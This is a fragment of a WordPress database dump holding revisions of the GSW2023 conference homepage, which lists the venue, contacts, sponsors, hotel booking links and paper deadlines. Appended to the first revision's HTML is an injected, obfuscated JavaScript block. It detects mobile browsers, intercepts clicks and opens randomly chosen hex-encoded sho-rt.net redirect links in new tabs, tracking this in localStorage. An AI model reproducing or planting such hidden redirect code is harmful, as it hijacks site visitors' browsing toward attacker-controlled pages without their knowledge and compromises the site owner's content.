style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h4>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-27 02:05:00','2023-05-27 02:05:00','',3066,'https://gsw2023.com/?p=4584',0,'revision','',0),
(4585,1,'2023-05-27 02:06:33','2023-05-27 02:06:33','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px 